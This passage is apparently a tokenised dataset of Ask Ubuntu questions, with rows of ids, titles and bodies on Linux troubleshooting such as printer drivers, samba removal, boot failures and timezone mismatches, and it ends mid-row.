153725	ripping dvd movie to near lossless video and audio quality	in the past i 've been backing up my dvds films as an .iso image to ensure that i have the best possible quality and that i could at a later date encode a movie/show to any format i want . however , as my dvd collection is continuing to expand i 'm running out of disk space , fast . i am now entertaining the idea of encoding my dvd collection to a high quality video files , rather than keeping them as disc images . i 'm looking for a guide that would allow me to retain the best possible video and sound quality , without resorting keeping a disc image . as i 'm an open source nut , i would , ideally , like to use an open source codec such as theora . also , an open source container ( mkv ? ) . i 'm not too savvy on audio options . i 'm aware that some devices will have problems reading theora/mkv . however , the idea is to create a high quality video file that can be converted to any type that is desired . so to sum up : best quality audio and video , without resorting to .iso uncompressed application to use ? container ? codec ? audio encoder ?
153727	javascript problem	i 've a problem with javascript on web browsers . i ca n't open facebook , i tried to delete cookies and cache , and thanks to this i manage to login and see the home page , but then whatever i do it will hang up loading and finally get 324 error ( empty response ) . maybe i found the culprit in the javascript because when i tried to deactivate it i finally managed to use facebook but chat timeline does n't work and loading time sucks . it happens both on chromium and firefox browsers but it does n't happens on the same computer with windows 7 . tried to uninstall openjdk7 and install oracle java 7 but nothing changed . how to solve it ? i 've already tried to disable all add-ons ( i do n't use greasemonkey ) but nothing changed , i manage to use facebook only when i disable javascript from the settings , and in that case both chat and timeline do n't work , and page load times are very long . i ca n't believe there 's no solution to this problem , the weird thing is that it happened suddenly , maybe due to buggy updates , i absolutely do n't know . the only thing i discovered is that is that javascript is to blame .
153739	how to view submitted apps for the ubuntu app showdown	i was wondering how to view the submitted apps for the contest . i am rather interested in what others are doing and so that i can start viewing for the poll . not to mention i want to try some new apps . : d
153746	xsane : failed to open device `hpaio : /net/photosmart_c5100_series ? zc=hp5180 ' : error during device i/o	printing from an application works . the hp-toolbox sometimes can not connect . and xsane pops the error message as in the title . connected through the network , i can ping the device , i can print to it . the all-in-one used to work fine a while ago ( at least before 12.04 ) . the output of hp-check -rt is as follows : hp linux imaging and printing system ( ver . 3.12.2 ) dependency/version check utility ver . 14.3 copyright ( c ) 2011-14 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . note : hp-check can be run in three modes : 1 . compile-time check mode ( -c or -- compile ) : use this mode before compiling the hplip supplied tarball ( .tar.gz or .run ) to determine if the proper dependencies are installed to successfully compile hplip . 2 . run-time check mode ( -r or -- run ) : use this mode to determine if a distro supplied package ( .deb , .rpm , etc ) or an already built hplip supplied tarball has the proper dependencies installed to successfully run . 3 . both compile- and run-time check mode ( -b or -- both ) ( default ) : this mode will check both of the above cases ( both compile- and run-time dependencies ) . saving output in log file : hp-check.log initializing . please wait ... -- -- -- -- -- -- -- - | system info | -- -- -- -- -- -- -- - basic system information : linux diablo 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux distribution : ubuntu 12.04 checking python version ... ok , version 2.7.3 installed checking pyqt 4.x version ... ok , version 4.9.1 installed . checking for cups ... status : scheduler is running warning : version : ( cups-config ) not available . unable to determine installed version of cups . ) error_log is set to level : warn checking for dbus/python-dbus ... dbus daemon is running . python-dbus version : 1.0.0 -- -- -- -- -- -- -- -- -- -- -- -- | runtime dependencies | -- -- -- -- -- -- -- -- -- -- -- -- checking for dependency : cups - common unix printing system ... ok , found . checking for dependency : cups ddk - cups driver development kit ... warning : not found ! this is an optional/runtime only dependency . some hplip functionality may not function properly . checking for dependency : ghostscript - postscript and pdf language interpreter and previewer ... ok , found . checking for dependency : pil - python imaging library ( required for commandline scanning with hp-scan ) ... ok , found . checking for dependency : policykit - administrative policy framework ... ok , found . checking for dependency : pyqt 4 dbus - dbus support for pyqt4 ... ok , found . checking for dependency : python dbus - python bindings for dbus ... ok , found . checking for dependency : python libnotify - python bindings for the libnotify desktop notifications ... ok , found . checking for dependency : python xml libraries ... ok , found . checking for dependency : python 2.3 or greater - required for fax functionality ... ok , found . checking for dependency : reportlab - pdf library for python ... ok , found . checking for dependency : sane - scanning library ... ok , found . checking for dependency : scanimage - shell scanning program ... ok , found . checking for dependency : xsane - graphical scanner frontend for sane ... ok , found . -- -- -- -- -- -- -- -- -- -- -- | hplip installation | -- -- -- -- -- -- -- -- -- -- -- currently installed hplip version ... hplip 3.12.2 currently installed in '/usr/share/hplip ' . current contents of '/etc/hp/hplip.conf ' file : # hplip.conf . generated from hplip.conf.in by configure . [ hplip ] version=3.12.2 [ dirs ] home=/usr/share/hplip run=/var/run ppd=/usr/share/ppd/hplip/hp ppdbase=/usr/share/ppd/hplip doc=/usr/share/doc/hplip-doc/html icon=no cupsbackend=/usr/lib/cups/backend cupsfilter=/usr/lib/cups/filter drv=/usr/share/cups/drv # following values are determined at configure time and can not be changed . [ configure ] network-build=yes pp-build=yes gui-build=yes scanner-build=yes fax-build=yes dbus-build=yes cups11-build=no doc-build=yes shadow-build=no hpijs-install=yes foomatic-drv-install=yes foomatic-ppd-install=yes foomatic-rip-hplip-install=no hpcups-install=yes cups-drv-install=yes cups-ppd-install=no internal-tag=3.12.2 restricted-build=no ui-toolkit=qt4 qt3=no qt4=yes policy-kit=yes hpijs-only-build=no lite-build=no udev-acl-rules=yes hpcups-only-build=no hpijs-only-build=no current contents of '/var/lib/hp/hplip.state ' file : # hplip.state - hplip runtime persistent variables . [ plugin ] installed=0 eula=0 current contents of '~/.hplip/hplip.conf ' file : [ last_used ] device_uri = `` hp : /net/photosmart_c5100_series ? zc=hp5180 '' printer_name = working_dir = . [ settings ] systray_visible = 0 systray_messages = 0 [ commands ] scan = /usr/bin/xsane -v % sane_uri % [ refresh ] rate = 30 enable = false type = 1 [ polling ] enable = false interval = 5 device_list = [ fax ] voice_phone = email_address = [ installation ] date_time = 06/20/2012 19:48:12 version = 3.12.2 -- -- -- -- -- -- -- -- -- -- -- -- -- | discovered usb devices | -- -- -- -- -- -- -- -- -- -- -- -- -- no devices found . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | installed cups printer queues | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - photosmart_c5100 -- -- -- -- -- -- -- -- type : printer device uri : hp : /net/photosmart_c5100_series ? zc=hp5180 ppd : /etc/cups/ppd/photosmart_c5100.ppd ppd description : hp photosmart c5100 series , hpcups 3.11.7 printer status : printer photosmart_c5100 is idle . enabled since wed 20 jun 2012 06:13:00 pm cest processing page 1 ... error : unable to communicate with device ( code=12 ) : hp : /net/photosmart_c5100_series ? zc=hp5180 error : unable to open channel error : communication status : failed printer -- -- -- - type : unknown device uri : socket : //printer:9100 ppd : /etc/cups/ppd/printer.ppd ppd description : hp photosmart c5100 series , hpcups 3.11.7 printer status : printer printer is idle . enabled since wed 20 jun 2012 06:21:34 pm cest ready to print . warning : printer is not hplip installed . printers must use the hp : or hpfax : cups backend to function in hplip . -- -- -- -- -- -- -- -- -- -- -- | sane configuration | -- -- -- -- -- -- -- -- -- -- -- 'hpaio ' in '/etc/sane.d/dll.conf ' ... 'hpaio ' in '/etc/sane.d/dll.d/hplip ' ... ok , found . sane backend 'hpaio ' is properly set up . checking output of 'scanimage -l ' ... device `hpaio : /net/photosmart_c5100_series ? zc=hp5180 ' is a hewlett-packard photosmart_c5100_series all-in-one -- -- -- -- -- -- -- -- -- -- - | python extensions | -- -- -- -- -- -- -- -- -- -- - checking 'cupsext ' cups extension ... ok , found . checking 'pcardext ' photocard extension ... ok , found . checking 'hpmudext ' i/o extension ... ok , found . checking 'scanext ' sane scanning extension ... ok , found . -- -- -- -- -- -- -- -- - | usb i/o setup | -- -- -- -- -- -- -- -- - checking for permissions of usb attached printers ... hp device 0x324 at 002:006 : warning : device uri : ( makeuri failed ) -- -- -- -- -- -- -- - | user groups | -- -- -- -- -- -- -- - jhendrix adm dialout cdrom plugdev lpadmin admin sambashare error : user needs to be member of group 'lp ' to enable print , scan & fax . user member of group 'lpadmin ' . -- -- -- -- -- - | summary | -- -- -- -- -- - error : 3 errors and/or warnings . please refer to the installation instructions at : http : //hplip.sourceforge.net/install/index.html done . my syslog shows these lines after starting xsane : jun 20 19:53:38 diablo xsane : io/hpmud/jd.c 800 : mdns lookup hp5180.local retry 19 ... jun 20 19:53:38 diablo xsane : io/hpmud/jd.c 800 : mdns lookup hp5180.local retry 20 ... jun 20 19:53:39 diablo xsane : io/hpmud/jd.c 796 : error timeout mdns lookup hp5180.local jun 20 19:53:42 diablo xsane : io/hpmud/jd.c 89 : unable to read device-id jun 20 19:53:53 diablo dbus [ 1704 ] : [ system ] failed to activate service 'org.freedesktop.avahi ' : timed out hints/tips anyone to get my scanner working again ?
153759	can not get the gedit autotab plugin to work	if you are trying to write python code inside of gedit , you probably want auto-tabbing . meaning suppose you are writing a method , you type something like : def foo ( ) : then hit enter . the cursor goes to the next line . you naturally hit tab to write code for the method def foo ( ) : print 'foo' so after print 'foo ' if you hit enter , the cursor comes to the beginning of the line ; it does n't auto tab and appear under the p in print so i googled for plugins , and i came up with gedit-autotab . but this one was developed when gnome2 was popular . hence i googled to find out about how to install plugins on unity and took references from here . basically it says we have to paste the downloaded stuff into : ~/.local/share/gedit/plugins however i have downloaded gedit-autotab and copied the archive contents to the above folder . and it did n't work ! how to get this fixed ?
153760	how to create gnome 3 extensions	i have installed and enjoyed the extensions provided by gnome3 . but i 'm looking for tutorials and sites that explain how to create them . do i need to know gtk3 and css and javascript ? i havenât done any development activities on ubuntu/gnome so i 'm pretty new at this .
153761	can i install to a raw logical volume , or must i partition the space first ?	i would like to install a kvm-based ubuntu guest to an lvm-based logical volume , without creating a partition table on the space first . there does n't seem to be a way within the installer to mount my chosen logical volume as root . i can do this ( of course ) with gentoo . is there anyway to bypass this assumption with ubuntu ?
153765	how do bugs get categorized and what is the lifecycle of a bug ?	how do bugs in ubuntu get categorized and what is a bug 's life cycle ? also , `` what does each bug 's 'status ' mean , and how is it determined ''
153770	how to have 'find ' not return the current directory	i 'm currently trying to find ( and copy ) all files and folder structure matching a specific pattern , in a specified directory and i 'm so nearly there ! specifically , i want to recursively copy all folders not begining with a '_ ' character from a specified path . find /source/path/with/directories -maxdepth 1 -type d ! -name _\* -exec cp -r { } /destination/path \ ; in the /source/path/with/directories/ path are machine-specific directories beginning with '_ ' and others , and i 'm only interested in copying the others . for a reason beyond me , the find command returns the /source/path/with/directories/ directory , and therefore copies its content , directories begining with '_ ' included . anyone have a hint as to why that is ? thanks , pascal
153782	what does the gtk loader compiz plugin do ?	in ccsm there is a `` gtk loader '' plugin . this is not used on a clean install . what does it do ? if it preloads gtk once like the tooltip implies then is it a good idea to turn it on ?
153784	wireless stopped working on dell inspiron mini	after trying to connect to a wired network , then unplugging the wired network and putting it to sleep , upon wakeup the wireless stopped working . even the network manager has the wireless option greyed out , and when i go into the network settings , it wo n't allow me to turn it on . toggling the wireless f2 switch does nothing . doing an does nothing and sometimes wo n't give me a new command line . i 've tried rebooting several times , and rebooting with earlier updates of ubuntu . i 'm running ubuntu 11.10 on a dell inspiron mini 1018 network controller : realtek semiconductor , rtl8188ce rfkill list shows : dell-wifi : wireless lan soft blocked : yes hard blocked : yes phy0 : wireless lan soft blocked : no hard blocked : yes a lshw shows : ethernet working fine , but wireless interface as disabled . a search for the drivers shows everything installed and detected . i ca n't figure out what to do in this . any help is hugely appreciated .
153785	removing samba error	i am having a problem with samba package . so i did the following to remove it , and got some errors . # sudo apt-get -- purge remove samba-common reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : samba* samba-common* samba-common-bin* 0 upgraded , 0 newly installed , 3 to remove and 6 not upgraded . 4 not fully installed or removed . after this operation , 42.4 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 195751 files and directories currently installed . ) removing samba ... purging configuration files for samba ... removing configuration file /etc/default/samba ... removing configuration file /etc/default/samba ... removing samba-common-bin ... removing samba-common ... purging configuration files for samba-common ... **perl : error while loading shared libraries : libperl.so.5.12 : can not open shared object file : no such file or directory dpkg : error processing samba-common ( -- purge ) : subprocess installed post-removal script returned error exit status 127 processing triggers for man-db ... perl : error while loading shared libraries : libperl.so.5.12 : can not open shared object file : no such file or directory processing triggers for ureadahead ... processing triggers for ufw ... errors were encountered while processing : samba-common** e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas ?
153788	glade : how can i set the value of a spin button ?	i 've done some spin buttons with glade for my python/gtk3 app , but i do n't know how to set things like default , lower or higher value . how can i do it ? using the following things for development : python 2.7.3 gtk 3 glade 3.12.1 1 ) i need to change things from script , as i need to set default value and maximum value as a variable ; 2 ) i saw the pygtk documentation before , it 's not working for gtk3 ; 3 ) please do n't direct me to the gtk3 docummentation ... i ca n't understand it : p
153789	syanptics touchpad wo n't re-enable	i disabled my synaptics touchpad while a key on my keyboard and now i ca n't get it to work again . when i press that key again it says the touchpad turns back on but will not work at all . rebooting does n't help , and i tried installing touchpad-indicator but when i try to enable from there it says that it enables , but the icon remains like it 's disabled . the odd thing is that it works on the lock screen so i know the drivers are n't messed up , it 's just a setting . also , the touchpad works on guest mode but still nothing on my account . i tried using gconf to set the touchpad_enable to true and it worked , it sure set it . does n't make a difference though , my touchpad is still useless . terminal commands i 've used : gconftool-2 -- set -- type boolean /desktop/gnome/peripherals/touchpad/touchpad_enabled true synclient touchpadoff=0 and : modprobe psmouse
153790	connection to openvpn access server	we are using an openvpn access server and i would like to connect to it via the vpn network setting ( network-manager-openvpn ) . i downloaded the client.ovpn and i can connect to the server via the command line : openvpn -- script-security 2 -- config client.ovpn how can i add the connection to the network manager ? which ( key ) entry is which ? user cert , ca cert , private key ? here is an example of the client.ovpn http : //nopaste.info/c10ec207f2.html thanks in advance .
153797	why use a bunch png 's instead of one svg in icon themes ?	from what i 've observed , one svg file works perfectly to replace a bunch of png files ( ie . using only nautilus.svg instead of 7 png 's of different sizes ) with out a loss of quality . is there a specific reason why icon themes supply both ? i 'm thinking of putting an icon theme together and i do n't want to have to make a bunch of different sized png 's . thanks
153801	permission issues with mounted new hard drive on ubuntu machine	i recently purchased a new hard drive , for the sole purpose of storing a database . i am running ubuntu 10.0.4 . since i had not done this sort of thing before , i decided to use the gui ( disk utility ) to format and mount the disk ( to avoid any snarfus caused by typos etc at the command line ) . i correctly identified the new drive and proceeded as follows : elected to format the drive selected type : 'ext4' selected the 'take ownership of filesystem ' checkbox unchecked the 'encrypt underlying device ' checkbox provided a name for the new volume ( mydata ) once the device had been formatted , i then mounted the device as follows : sudo mount /dev/sdb /mydata i created the directory /mydata/pgdbdata and changed ownership as follows sudo chown -r postgres : postgres /mydata/pgdbdata i check : username @ localhost : ~ $ ls -l /mydata/ total 20 drwx -- -- -- 2 root root 16384 2012-06-19 23:05 lost+found drwxr-xr-x 2 postgres postgres 4096 2012-06-20 19:04 pgdbdata however when i change to postgres user : username @ localhost : ~ $ sudo su - postgres postgres @ localhost : ~ $ ls -l /mydata/ ls : can not open directory /mydata/ : permission denied because of this permissions issue , i can start the postgresql service and i ca n't create the postgresql db cluster . i am stuck . what am i doing wrong ?
153804	is the latest remmina 1.0 in the official 12.04 repositories ?	i just noticed that the copy of remmina i have on my machine ( running ubuntu 12.04 ) is 9.99.1 ( this is up to date according to apt ) . the remmina website says that the most recent version is version 1.0 which uses freerdp . i 'd like to use freerdp instead of rdesktop because of the improved ms remoteapp support . to cut to the chase , is version 1.0 of remmina in the repos , or do i have to install it manually ? ( i 've had a quick browse but have n't found anything ) . edit : running rmadison remmina returns the following ( trimmed to only show the precise repo details ) remmina | 1.0.0-1ubuntu5 | precise | source , amd64 , armel , armhf , i386 , powerpc remmina | 1.0.0-1ubuntu6.1 | precise-updates | source , amd64 , armel , armhf , i386 , powerpc which is supposedly the version i have installed , however the `` about '' dialog says version 0.99 . additionally , freerdp is not installed on my system , so remmina can not be at version 1.0 . added :
153807	ecryptfs and ssh pubkey login - how automount and other stuff ?	i have moved my ssh authorized_keys to an /etc/ssh/ subfolder , so i can login with pubkeys and have root in control of ssh access , but there are 2 problems left . it does not automount my users ecryptfs and when i manually mount it my terminal settings arent loaded , things like aliases and paths . how can i make this happen on sshlogin ?
153811	how to make fn keys working on asus g75 laptop	edit as tholap said , all i needed was a kernel update , which is effective for a little while now end edit i just bought a asus g75 and i can not make the fn keys working . i only found how to control the brightness ( http : //askubuntu.com/questions/126441/brightness-controls-doesnt-work-on-a-macbook-pro-5-5-ubuntu-12-04-lts ) but the other keys are not recognized . i did n't know much things about key binding before digging , but i tried : testing with xev : no output ... testing with keymap : no output ... modprobe asus-laptop : fatal : error inserting asus_laptop ( /lib/modules/3.2.0-25-generic/kernel/drivers/platform/x86/asus-laptop.ko ) : no such device ( not sure what that means ) modprobe asus-nb-wmi : fatal : error inserting asus_nb_wmi ( /lib/modules/3.2.0-25-generic/drivers/platform/x86/asus-nb-wmi.ko ) : no such device ( not sure what that means ) thanks for your advice david
153813	crippling repeating `` pciehp card not present '' notifications	when using ubuntu ( 12.04 , both installed and on a live usb ) i get a lot of these messages : pciehp 0000:00:1c.5 : pcie04 : card not present on slot ( 37 ) pciehp 0000:00:1c.5 : pcie04 : card present on slot ( 37 ) and with a lot i mean about 20 per second . this has a crippling effect , and i would like to get rid of it : ) the computer is a packard bell easynote bg48-u-100 dc . i tip i picked up from some fedora/redhat error here was to look at lspci -vnn . i have pasted the part about `` 00:1c.5 '' here : http : //pastebin.com/0sfsiqw2 for what good it may do , here is the lsmod of my machine : http : //pastebin.com/dqzy1kal from that first pastebin i think to conclude that it has to do with the module shpchp , which seems to me ( aka : google ) to have something to do with acpi . that 's as far as i 've come in disecting this . can anyone help me along further ? what can i do , check etc ? i did see this topic but my intentions are not to surpress the error message : i know how to do this ( from that topic ; ) ) , but i 'm looking for a real sollution . finding the problem on the internet does suspect me to believe it is neither an ubuntu specific nor a packard-bell specific problem.if you google the problem it seems that is present on several other distribution/hardware combo 's as well , and it looks like the advice is to remove one of the drivers ? i have no clue as to which driver i should look at and and what would be the effect of just removing it . i have seen this topic which is old-ish , but describes my problem and is about a similar computer . the solution in this topic was to compile a new kernel using a spanish guide , which seems a bit extreme to me , so i 'm kinda hoping for a better solution than that . edit : i just tested on 12.10 which still has the problem on the account of surpressing : i can surpress it in the syslog , but the io still goes on . i do also see the mentions in dmesg , and in one of the consoles . even a way to surpress all these things would be a help at this point . another test also shows that a quick fedora boot has the same issues on this machine
153814	gui time is different than command line time	i have kind of an odd problem . the time in my unity bar is right , but the time in bash is 2 hours ahead . $ date wed jun 20 15:31:55 cdt 2012 unity bar : wed jun 20 13:31:55 here are my etc configs : $ cat /etc/timezone america/los_angeles locale : $ locale lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= finally , i tried $ sudo dpkg-reconfigure tzdata and setting it to `` los_angeles '' . has anyone seen anything like this ? edit so i installed ubuntu on another computer and after i installed updates using dist-upgrate , it was 2 hours ahead again ... on a completely new computer . here is the output from apt : http : //pastebin.com/jmffjns4
153816	how to install a specific gcc version ?	i 'd like to install an older version of gcc on my ubuntu lucid machine . particularly , i am interested in 2.95.3 or 3.0.2 . is there any repository to download this package with the apt-get command ?
153817	best way to install gnome on headless ubuntu server	i installed a new headless server with 12.04 and ssh . now users want to ssh in and use gnome-terminal , gedit , etc ... . rather than install each of these separately , is there a parent package that would install most/all of the g* apps ?
153820	acpi error : laptop can not hibernate	hibernate does not work on my lenovo w520 laptop . the computer freezes with the error message [ 6218.321519 ] acpi : unable to dock ! the number in the square brackets can be different each time . the ubuntu is version 10.10 . does anyone know how to fix the problem ? thanks !
153823	how to run a .pyc ( compiled python ) file ?	whenever i compile a python file , i get a *.pyc file . when i try to run that , i get a message saying there is no program for running them . when i search for a program online via that option , it says there are none . can anyone help me run there files ?
153824	ubuntu variant / linux distros which uses least system resources ( ram , cpu ) ?	i have a netbook ( an older asus eeepc 1005ha ) which i want to get rid of windows on ( i like windows , but i do n't think it works well in a netbook environment ) . basically , my question is which ubuntu variant will use the least ram and cpu running idle , and/or the same question except when running firefox and libreoffice writer , say . i am also open to suggestions of non-ubuntu linux distros , but since this is askubuntu i thought the first question would be more appropriate . i have a disk drive which i can attach to the netbook , so it does n't have to be a ubuntu variant / linux distro which solely boots from a usb drive . i have at my disposal : dvds , dvd writer/ disk drive , 4gb flash drive , 8 gb flash drive i was thinking either lubuntu or archbang / crunchbang but i would like some help from more knowledgable people specs : ca n't boot into it right now , but i think i have either intel atom n270 @ 1.60ghz or intel atom n280 @ 1.66ghz ( single core , i think ) 2gb ram 160 gb hard drive
153827	trying to install canon lbp7750cdn driver on ubuntu 12.04	i'n new to ubuntu/linux and had significant difficulties while attempting to configure my printer to work . the automatic driver pairing wizard which ubuntu uses to identify and install the appropriate drivers did not find my printer 's driver . i managed to get it to print when i manually select the generic configuration and checked the pcl6 configuration . however , the printer driver wizard does provide a list of canon printers and actually do specify my printer as lbp7750c ( minus the `` dn '' at the end , i 'm assuming its because duplex ability and networking is not present on all the models - i 'm not sure if this could be the source of the problem ) , but in selecting this option and trying to print i receive this message : idle - /usr/lib/cups/filter/foomatic-rip failed i searched for this similar problem which other users might have encountered , but while there where plenty of such cases , they all had different resolutions and were all related to hp printers . canon actually do provide a driver for my printer , but it comes with no installation instructions unless you consider yourself an experienced cups guru . seriously . if anyone can help me solve this foomatic-rip failed problem i 'd be really grateful - and i 'm sure many other folks too . [ btw , ca n't canonical fix this type of thing for the next ubuntu release ? - i't seems like a small problem but it causes many problems and countles hours of production time loss . ] thanks in advance .
153828	how to use the accountsservice api with python ?	i 'm writing an application for the ubuntu app showdown and i try to read/write the user 's profile picture using this > > > from gi.repository import accountsservice , glib > > > current_user = glib.get_user_name ( ) > > > user = accountsservice.usermanager.get_default ( ) .get_user ( current_user ) > > > print user.get_icon_file ( ) none > > > print user.get_user_name ( ) none but apparently does not work . is there another way to use accountsservice with python ? i could not find more documentation about accountsservice and python . ps : to test this example you need to install gir1.2-accountsservice-1.0 on ubuntu 12.04 . $ sudo apt-get install gir1.2-accountsservice-1.0
153831	how to speed up the dash response ?	is there a way to speed up the dash ? when i press the super key for the first time it can take ~2 seconds for the dash to appear . whereas if i use synapse , it will appear instantly .
153833	why ca n't i mount the ubuntu 12.04 installer isos in mac os x ?	over the past few days , i have downloaded both the 32 and 64 bit version of server and desktop to install on an intel based pc . it is normal from within os x to double click on an iso and it will mount the iso in the finder as well as within disk utility . when i attempt to mount any of the ubuntu isos i downloaded , os x returns the error message the following disk images could n't be opened . the reason given for the error is no mountable filesystem . however , i am still able to open the iso directly from disk utility and burn it to a dvd/cd . what has changed in this release to cause this ? is there something wrong with the current isos ? the os x machine i am using is only two weeks old and is having no issues with any other iso .
153838	how do i get dark toolbars in gtkmm ?	how do i get dark toolbars in gtkmm like in gedit or system settings ? i can only seem to find how to do it in pygtk .
153841	why is lowlatency kernel not being updated in parallel with the generic kernel ?	all , any idea when we 'll see updates to the lowlatency version of the ubuntu 12.04 kernel ? it is still stuck at 3.2.0.23 whereas the generic kernel is already several updates ahead of it at a version 3.2.0.25 ? nb : i am using a 64-bit version but i do n't think this is limited to the 64-bit kernels alone but rather affects both 32-bit and 64-bit builds . please do correct me if i am wrong about this .
153846	why does my fat32 usb attached disk not mount in 64-bit ubuntu 12.04 ?	i run ubuntu 12.04 x64 . i have a fat32 usb disk with valuable data on it but it does not mount . i can see and access it when i plug it in to a windows machine , but not on ubuntu . i tried all kind of ways to mount it , no result so far . i was assuming it would show up automatically once connected . what to do ? update : lsusb output ( copied from comment ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0644:0200 teac corp. all-in-one multi-card reader ca200/b/s bus 002 device 003 : id 046d:08c5 logitech , inc. quickcam pro 5000 bus 002 device 004 : id 0424:2504 standard microsystems corp. usb 2.0 hub bus 002 device 005 : id 0461:4d15 primax electronics , ltd dell optical mouse bus 002 device 006 : id 413c:2003 dell computer corp . keyboard update : drive is now attached ( copied from comment ) the drive just 'spontaneously ' came up . i do n't know why . there is now an extra line in lsusb bus 002 device 123 : id 059b:0371 iomega corp .
153851	orange screen with vertical stripes	after having installed ubuntu without internet conecction , i restart the pc , go to bios , change boot priority to internal harddrive , save and exit . then the pc starts again but the screen gets orange with vertical stripes and stays like that . i tried both versions 64 bit and 32 bit 12.04 . i ca n't use internet before having ubuntu , because y have to make a network configuration ( this is not allowed in the trial version before the installed version ) .
153852	can not boot ! initramfs error !	i 've had ubuntu for a while and it 'd been working fine till now . every time i try to boot i get this message and i can not go any further : busybox v1.17.1 ( ubuntu 1:1.17.1-10ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) my main worry are my files and pictures as i do n't have a back-up . any advice would be very much appreciated !
153857	zimbra mail server	is dns configuration required for zimbra mail server . i installed zimbra with out configuraing dns .. i am unable to start mailbox . antivirus running imapproxy running ldap running logger running mailbox stopped zmmailboxdctl is not running . memcached running mta running snmp running spell running stats running zmconfigd running couls you please help out ? ? ?
153858	how do i format an external harddrive so files can be accessed by both ubuntu and pc ?	i want to use my passport mini-external hard drive to store simple files ( i.e . avi 's , .mp3 's , etc ) from my ubuntu desk top , and be able to access them from my windows 7 laptop as well . i believe it is formatted as fat32 , but the hard drive may also be disk protected , making formating the hard drive difficult . would the drive need to be in ntfs to work on both ? is it even possible ?
153860	vfs : can not open root device [ uuid ] or unknown-block ( 0,0 ) / kernel panic not syncinc vfs	i am running ubuntu 11.10 x86-64 in virtual box . while shutting down the last time the system ran normally , it seemed to have hung up , so i just killed the system . when i wanted to boot it again , nothing happened . if i go to recovery mode in grub i get following information : vfs : can not open root device `` uuid=99532d26-eb6b-43bf-8520-916a85d6a69d '' in unknown-block ( 0,0 ) please append a correct `` root= '' boot option ; here are the available partitions : 0b00 1048575 sr0 driver : sr kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) pid : 1 , comm : swapper not tainted 3.0.0-19-generic # 33-ubuntu as i read in several other boards it seems that grub ca n't find '/ ' . so i booted from the ( virtual ) live-cd and did the following : sudo mount /dev/sda1 /mnt # according to `sudo fdisk -l` sda1 is my booting partition sudo mount -- bind /dev /mnt/dev sudo mount -- bind /proc /mnt/proc sudo chroot /mnt cp -r /usr/lib/x86_64-linux-gnu/pango /usr/lib update-initramfs -u -k 3.0.0-12-generic update-grub2 # does not seem to work : can not find list of partitions ! ( try mounting /sys . ) then i rebooted , chose the non-recover entry and nothing happened again . i did this like 3 times and it was the same always . hopefully somebody can help me . thanks in advance !
153870	ubuntu 12.04 running from an external hard drive freezes frequently	i have the late-2009 model of the imac ( with the latest version of lion ) and i use a refit cd frequently to switch from os x to ubuntu and vice versa . ubuntu 12.04 is installed on a partition of an external hard drive and the rest is used as a time machine . i 've noticed recently that at times , ubuntu will suddenly freeze everything on the desktop except for the mouse . when this happens , i can unplug the external hard drive and nothing happens ; the mouse ( bluetooth ) continues to function , but clicking or hovering over anything makes it useless . at this point , i have to manually hold down the mac 's power button and reboot to the refit cd . i 've installed the graphics driver it needs and at this point , i ca n't see what could cause it to freeze like this . should i just file a bug , or does anyone have any workaround suggestions to unresponsiveness ? thanks in advance . edit it appears that after installing 'nvidia-current , ' i have not experienced freezing issues . i 'll update this post if it freezes again .
153872	asus 1201n will not sleep with kubuntu 12.04	my asus 1201n running kubuntu 12.04 will not sleep or suspend . processor is an atom n330 graphics aree 1st generation nvidia ion
153884	why does ubuntu-restricted-extras want to remove some libav packages ?	when i try to install `` ubuntu restricted extras '' in `` ubuntu software center '' , it displays a warning dialog that says the following items must be removed : libavcodec53 libavutil51 why ? and if i choose to install `` ubuntu restricted extras '' , what will i lose ? ps : i think i noticed libavcodec53 flash past as my daily build of codeblocks package was installing ... so that 's one possibility . will i break my software development environment if i install `` ubuntu restricted extras '' ? or do these packages need to be removed because they are included in `` ubuntu restricted extras '' ? if so , why does n't the dialog mention that ( and remove the worry and confusion ) ? ps : the output generated by apt-get -s install ubuntu-restricted-extras is note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : cabextract gstreamer0.10-plugins-bad-multiverse libavcodec-extra-53 libavutil-extra-51 libfaac0 libmjpegtools-1.9 libopenjpeg2 libquicktime2 ttf-mscorefonts-installer unrar suggested packages : libfaad0 the following packages will be removed : libavcodec53 libavutil51 the following new packages will be installed : cabextract gstreamer0.10-plugins-bad-multiverse libavcodec-extra-53 libavutil-extra-51 libfaac0 libmjpegtools-1.9 libopenjpeg2 libquicktime2 ttf-mscorefonts-installer ubuntu-restricted-extras unrar 0 upgraded , 11 newly installed , 2 to remove and 0 not upgraded . remv libavutil51 [ 4:0.8.3-0ubuntu0.12.04.1 ] [ libswscale2 : amd64 libavcodec53 : amd64 gstreamer0.10-ffmpeg : amd64 libpostproc52 : amd64 libavformat53 : amd64 ] inst libavutil-extra-51 ( 4:0.8.3ubuntu0.12.04.1 ubuntu:12.04/precise-updates [ amd64 ] ) conf libavutil-extra-51 ( 